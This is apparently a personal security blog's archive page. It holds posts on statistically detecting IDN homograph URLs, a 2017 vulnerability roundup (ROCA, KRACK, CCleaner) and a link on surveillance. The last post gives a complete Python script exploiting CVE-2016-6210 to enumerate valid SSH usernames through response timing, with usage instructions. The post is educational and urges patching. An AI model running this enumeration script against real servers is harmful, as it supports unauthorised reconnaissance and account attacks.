Programming, Security, Privacy, Technical

A Study in IDN Homograph Attack Detection

A Brief Introduction…

How well do you scrutinize the URLs that you click in a browser? Are you the wild type who clicks links before reading them? Or perhaps you are the cautious type: one of the careful number who hover over the link (without clicking), check the address that appears in the browser bar, and confirm that it has a valid certificate (which might not mean as much as people think).

Let’s say that you are trying to get to ‘facebook.com’. You see a link and hover over it. The URL that appears in the browser bar says ‘facebook.com’. You click the link, but it takes you to a phishing site.

What happened? You checked the link. It said it was ‘facebook.com’!

You may have fallen victim to an IDN homograph attack. A homograph is a word that is written the same as another word but has a different meaning. In the example above, the user clicked a link that looked like ‘facebook.com’ but meant something different. How can that happen? The ‘how’ comes from the ‘IDN’ portion of the name: ‘internationalized domain name’. The URL in the address bar is actually pointing to a domain name. A domain name is the human-readable name of a website. The real address of a website (server) is an IP address, but people aren’t that great at remembering those, so domain names make them memorable. For example, you can remember ‘facebook.com’ (the domain name) or you can remember ‘31.13.76.68’ (the IP address).

The problem with domain names is that there are many languages. How do you support Mandarin characters in a domain name? Or Russian? You have to internationalize your ‘charset’ (the set of allowed characters, or individual letters). By internationalizing your charset, you now accept a far greater number of characters than just simple English (Latin-based) characters. This lets people have domain names in their own language. But there is a downside. In the internationalized charset, the same-looking character may appear multiple times under different languages. For example, the Cyrillic and Greek charsets (or alphabets) share characters (letters) that are similar to Latin ones. These characters have separate identifiers but look very close, if not identical, to each other.

In the facebook example, the lower-case letter ‘o’ is identified by the character code ‘006F’ in the Latin alphabet (“Latin small letter o”), but could also be ‘03BF’ in the Greek alphabet (“Greek small letter omicron”). If I were to register the domain name facebook.com but with the Greek version of those letters, it might pass internationalized domain name registration. I could then use this URL to trick people into clicking the link because it visually looks like the real thing. An even simpler example is the substitution of a capital ‘O’ with the number zero (0) in the domain name.
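
To see the difference for yourself, here is a small Python snippet (not part of the project) that prints the code point and Unicode name of each version of the letter. Both render as ‘o’, but they are entirely different characters, and therefore produce entirely different domain names:

import unicodedata

latin_o = '\u006F'   # Latin small letter o
greek_o = '\u03BF'   # Greek small letter omicron

for ch in (latin_o, greek_o):
    print(ch, 'U+%04X' % ord(ch), unicodedata.name(ch))

# Output:
# o U+006F LATIN SMALL LETTER O
# ο U+03BF GREEK SMALL LETTER OMICRON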

I wanted to see if I could detect these types of attacks and flag them using basic statistics.

The Idea…

My idea was quite simple. Each character in a charset maps to a unique identifier (a number), and the characters of an alphabet (or charset) are grouped together, so their identifiers will be close together. The plan was to run basic statistical analysis (mean, median, max, min, and standard deviation) on the individual characters of a URL (or domain name). If there are characters outside the usual range, then throw a ‘red flag’. I also had to account for the fact that punctuation may throw off any analysis, so there have to be at least a few methods to identify anomalies: hence the calculation of mean, median, max, min, and standard deviations. I avoided using neural networks for this particular problem although, as you will see in my summary/future works section, I can see merit in taking it that way.
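
As a rough illustration of the idea (a sketch, not the project’s code), the per-string statistics come straight from the characters’ code points:

import statistics

def char_stats(domain):
    # Unicode code point of every character in the domain name
    codes = [ord(c) for c in domain]
    return {
        'mean': statistics.mean(codes),
        'median': statistics.median(codes),
        'stdev': statistics.pstdev(codes),
        'min': min(codes),
        'max': max(codes),
    }

print(char_stats('facebook.com'))            # all Latin: a tight, low range
print(char_stats('faceb\u03bf\u03bfk.com'))  # Greek omicrons pull the max and stdev way up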

I wanted a basic proof-of-concept system that would take a corpus of known valid URLs and derive a statistical model from them. Then I would use this model to compare new URLs and determine if they are within the same alphabet or if there was a possibility that they were homograph attacks.

The Project…

You can see/fork/download the project code here: https://github.com/calebshortt/homograph_detector

The project is quite simple and has two files in the main ‘base’ package. The ‘meat’ of the system is in the analysis.py file. The ‘results.py’ file was used to manage and compare results.

The flow is as such:

  1. Train the system using either a given string or a file with many strings
  2. Pass the system either a given string or a file with many strings to test
  3. Generate results and output them

The comparison function simply takes the statistics for the given test string and compares it (based on a defined number of standard deviations — default 2) to the model statistics — these are based on mean, median, and the standard deviations themselves (I actually created a metric that is the standard deviation of standard deviations). It also compares the max and min ranges of the character identifiers — this is a crude way to check the number ranges.
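
For reference, model statistics with those names could be derived from a training corpus roughly as follows. This is an illustrative sketch that reuses the char_stats() helper from above; the actual project stores these values on a ResultSet object rather than in a dictionary:

import statistics

def build_model(corpus):
    # Per-string character statistics for every known-good URL/domain in the corpus
    per_string = [char_stats(s) for s in corpus]
    return {
        'mean_means':    statistics.mean([s['mean'] for s in per_string]),
        'stdev_means':   statistics.pstdev([s['mean'] for s in per_string]),
        'mean_medians':  statistics.mean([s['median'] for s in per_string]),
        'stdev_medians': statistics.pstdev([s['median'] for s in per_string]),
        'mean_stdevs':   statistics.mean([s['stdev'] for s in per_string]),
        'stdev_stdevs':  statistics.pstdev([s['stdev'] for s in per_string]),  # the "stdev of stdevs"
        'result_min':    min(s['min'] for s in per_string),
        'result_max':    max(s['max'] for s in per_string),
    }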

Here is the comparison function code:

def compare(self, str_stats, stdev_threshold=2):
    """
    :param str_stats: ResultSet object
    :param stdev_threshold: (int) number of standard deviations allowed
    :return:
    """

    print('Analysing: Threshold: %s standard deviations...' % stdev_threshold)

    str_max = str_stats.result_max
    str_min = str_stats.result_min
    str_mean = str_stats.mean_means
    str_median = str_stats.mean_medians
    str_stdev = str_stats.mean_stdevs

    # Crude range check: the test string's code points must fall inside the model's min/max
    if not (self.result_min <= str_min <= str_max <= self.result_max):
        return False, str_stats.all_stats, 'max/min range'

    # Each statistic must fall within the threshold number of standard deviations of the model
    r_mean_low = self.mean_means - stdev_threshold*self.stdev_means
    r_mean_high = self.mean_means + stdev_threshold*self.stdev_means
    if not (r_mean_low <= str_mean <= r_mean_high):
        return False, str_stats.all_stats, 'mean'

    r_median_low = self.mean_medians - stdev_threshold*self.stdev_medians
    r_median_high = self.mean_medians + stdev_threshold*self.stdev_medians
    if not (r_median_low <= str_median <= r_median_high):
        return False, str_stats.all_stats, 'median'

    r_std_low = self.mean_stdevs - stdev_threshold*self.stdev_stdevs
    r_std_high = self.mean_stdevs + stdev_threshold*self.stdev_stdevs
    if not (r_std_low <= str_stdev <= r_std_high):
        return False, str_stats.all_stats, 'stdev'

    return True, str_stats.all_stats, None

NOTE: The above code compares the given string to the model ResultSet data in ‘self’.

Preliminary Results, Conclusion, and Future Work

The system was able to digest a Latin alphabet-based corpus (included in the source) and correctly identify URLs that had characters from other alphabets in them. The interesting thing about this method is that once the model is generated based on the corpus, it can be recorded and reused — no need to regenerate the model (which took the most time). The system was fast and quite accurate at first glance, although more analysis would be needed to make any real claims on its accuracy.

My file-load function breaks on some charsets, as they are not handled by the default encoding of Python’s file-loading function (that, or I missed something). I am working to fix this without clobbering the original encoding of the URL (which would defeat the purpose of this experiment).
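
A minimal sketch of the likely fix, assuming the corpus files are UTF-8 encoded (the filename here is just a placeholder), is to pass an explicit encoding instead of relying on the platform default:

# 'surrogateescape' keeps any undecodable bytes round-trippable
# instead of silently mangling the original URL
with open('corpus.txt', 'r', encoding='utf-8', errors='surrogateescape') as f:
    urls = f.read().splitlines()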

This is already starting to look like a neural network would work nicely for this particular problem. I would like to feed the model stats into an ANN with perhaps some other inputs and see how it does. The basic stats I used were able to get decent results, but there are obvious edge cases that standard statistics wouldn’t identify (such as the old ‘substitute the 0 (zero) in for capital O’ trick). A neural network may help catch those.

I would say that it is quite possible to identify IDN homograph attacks using basic statistics and there are a few paths forward to improve accuracy with the results already demonstrated. With that said, nothing will compare to the standard ‘look before you click’ mentality. Users who identify the ‘0 instead of O’ substitution will not leave as much to chance. Systems like these aren’t catch-alls.

Programming, Security, Privacy, Technical

Growing Threats, Growing Attack Surface

It has been an interesting year of breaches, vulnerabilities, and scares: from the recent ROCA vulnerability in Infineon’s key-generation library, used in TPMs and widely across the Smart Card industry, to the less-exploitable-but-still-serious KRACK vulnerability that makes attacks on the WPA2 Wi-Fi security protocol possible, to the supply chain attack on CCleaner, a popular utility program for cleaning up a user’s computer.

What is clearly emerging from such events is that there is still much work to be done in the security space. The Ixia Security Report for 2017 describes an increase in the amount of malware and an increase in the size of companies’ attack surfaces. Attack surface is the exposed, or public-facing, “surface area” of a company. Some have attributed the increase in attack surface to increased usage, and misconfiguration, of cloud infrastructure. They argue that misconfiguration of servers looks to be replacing some of the more traditional OWASP Top 10 vulnerabilities, such as SQL injection.

But the vulnerabilities listed above (ROCA, KRACK, and the CCleaner supply chain attack) aren’t necessarily cloud-related.

ROCA relates to an incorrectly implemented software library, specifically its key pair generation. It allows an attacker to recover the private (secret) key just from the public key, by factoring it. Modern encryption relies on a public key (that is sent to whoever wants it) and a secret (private) key that only the owner has and uses to decrypt messages; only the private key can decrypt messages sent to the owner. This vulnerability allows anyone with the public key and some decent computational power (say, an AWS cluster used to number-crunch) to derive the original private key and decrypt the messages sent to the original owner. The computational power required is in the realm of “expensive but possible”: a targeted attack is a very real possibility, but widespread breaching would be infeasible.

KRACK involves a key reinstallation attack built on replaying part of the handshake. “By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic”. This vulnerability requires a physical component, as the attacker has to be within range of the Wi-Fi network. The cause is inherent to the standard itself, which means all correctly implemented versions of the standard are vulnerable (i.e. libraries that implemented it to spec). Many security practitioners have taken this particular moment in time to explain that using a Virtual Private Network (VPN) would mitigate such attacks, and that Wi-Fi should be treated as an untrusted network to begin with.

The CCleaner supply chain attack involved the injection of malware into a library used in the implementation of CCleaner: when the CCleaner program is packaged and deployed, it includes this compromised third-party component in its package. This type of attack takes advantage of consumers’ trust in CCleaner, and it is becoming a more popular approach among hackers. For the record, CCleaner has been sanitized and is no longer a threat from this malware. I imagine Avast, the company that offers CCleaner, also took a look at its supply chain trust and revamped some policies around it.

Each of these attacks comes in addition to the general increase in attack surface and the increasingly common misconfiguration of servers. Supply chain attacks are on the rise because they clearly work. There are plenty of incorrect implementations of standards or protocols that hackers can take advantage of. Far less often, there are errors in the standards or protocols themselves.

It may seem like the odds are stacked against an organization’s security team. They are. That is why security is not only the responsibility of the security team, but of the entire organization: from the executives, to the developers (who choose which libraries to use in their software), to the tech support teams that are often on the “front line” with customers.

Education is always a good first step.

General, Security, Privacy

History and its Uncanny Ability to Repeat Itself

The EFF has published a well-cited and informed article on why it views the current trend of dragnet surveillance as thoroughly against the U.S. Constitution.

Even if you are not an American, this article touches on ideals shared by many. It describes the context in which the Fourth Amendment was created and goes into specific detail about who thought it so important, and why:

“Using ‘writs of assistance,’ the King authorized his agents to carry out wide ranging searches to anyone, anywhere, and anytime regardless of whether they were suspected of a crime. These ‘hated writs’ spurred colonists toward revolution and directly motivated James Madison’s crafting of the Fourth Amendment.”

I highly recommend reading the entire article: The NSA’s “General Warrants”: How the Founding Fathers Fought an 18th Century Version of the President’s Illegal Domestic Spying

 

Programming, Security, Privacy, Technical

A Look At Using Discovered Exploits

There are usually two general steps in creating a software exploit.

The first step is the vulnerability discovery. This is the harder of the two steps. It requires in-depth knowledge of the target software, device, or protocol and a creative mind that is tuned to edge cases and exceptions.

The second step is the exploitation of the discovered vulnerability. This requires the developer to take the vulnerability description and write a module or script that takes advantage of it.

This article will address the second step: Exploit creation.

First, where do we find vulnerabilities for software if we do not discover them ourselves? There are online databases that store published vulnerabilities (and may include example code) in a searchable format. A few examples are CVE, exploit-db, and the NVD.

Looking through these databases, we will see that every published vulnerability has a unique CVE identifier, uniquely identifying each vulnerability that has been discovered and confirmed. Using the databases we can search for potential vulnerabilities of a particular target. (Note: this is similar to what a bot might do after it has scanned a new target server: look up any published vulnerabilities that apply.)

Some vulnerability entries even include sample code, such as CVE-2016-6210. This makes it trivial to write a script that takes advantage of the vulnerability. For example, we could take the code given in CVE-2016-6210 and expand it into a command-line script that takes a list of known usernames and tries each one… which is the vulnerability the CVE describes: “SSH Username Enumeration Vulnerability”.

This script will not breach the system, but what it will do is try to find valid usernames via SSH. This vulnerability may lead to, or become part of, a larger attack. It is important to patch all discovered vulnerabilities as you don’t know how an adversary will try to attack your system.

Given the sample code, here is our improved version:


import paramiko
import time
import argparse
import logging

logging.basicConfig()

class Engine(object):
    file_path = None
    target = ''
    userlist = ['root']
    calc_times = []

    req_time = 0.0
    num_pools = 10

    def __init__(self, target, filepath=None, req_time=0.0):
        self.req_time = req_time
        self.target = target
        self.file_path = filepath
        if self.file_path:
            self.load_users(filepath)

    def load_users(self, filepath):
        # One username per line
        data = []
        with open(filepath, 'r') as f:
            data = f.read().splitlines()
        self.userlist = data

    def partition_list(self, p_list):
        # Split the user list into roughly equal chunks (one per pool)
        p_size = max(1, len(p_list) // self.num_pools)
        for i in range(0, len(p_list), p_size):
            yield p_list[i:i+p_size]

    def execute(self):
        for user in self.userlist:
            self.test_with_user(user)

    def test_with_user(self, user):
        # CVE-2016-6210: an overly long password forces sshd to spend extra time
        # hashing it when the username exists, so valid users respond more slowly
        p = 'A' * 25000
        ssh = paramiko.SSHClient()
        start_time = time.time()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        end_time = time.time()
        try:
            ssh.connect(self.target, username=user, password=p)
        except Exception:
            end_time = time.time()
        total = end_time - start_time
        self.calc_times.append(total)
        avg = sum(self.calc_times) / len(self.calc_times)
        flag = '*' if total > avg else ''  # mark usernames that took longer than the running average
        print('%s:\t\t%s\t%s' % (user, total, flag))
        time.sleep(self.req_time)
        ssh.close()

def main(ip_addr, filename=None, req_time=0.0):
    if ip_addr == '' or not ip_addr:
        print('No target IP specified')
        return
    if filename == '':
        filename = None
    engine = Engine(target=ip_addr, filepath=filename, req_time=req_time)
    engine.execute()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Simple automated script for CVE 2016-6210 -- OpenSSHD 7.2p2 >= version')
    parser.add_argument('ip', help='[Required] The IP of the target server')
    parser.add_argument('-u', '--userlist', help='Specify a filepath with a list of usernames to try -- one username per line')
    parser.add_argument('-t', '--time', help='Set the time between requests (in seconds)')
    ip_addr = None
    filename = None
    req_time = 0.0
    args = parser.parse_args()

    if args.ip:
        ip_addr = args.ip
    if args.userlist:
        filename = args.userlist
    if args.time:
        req_time = float(args.time)
    main(ip_addr, filename, req_time)
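
Running the script (assuming it is saved as, say, ssh_enum.py; the IP address and username file below are placeholders) looks something like this:

python ssh_enum.py 192.0.2.10 -u usernames.txt -t 0.5

Usernames whose connection attempts take longer than the running average are flagged with an asterisk, which is the timing signal CVE-2016-6210 describes.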

 

It is much easier to write exploits for already-discovered vulnerabilities than it is to discover them yourself.

This is why it is vital that system admins keep their servers and software up to date.

 

 

 
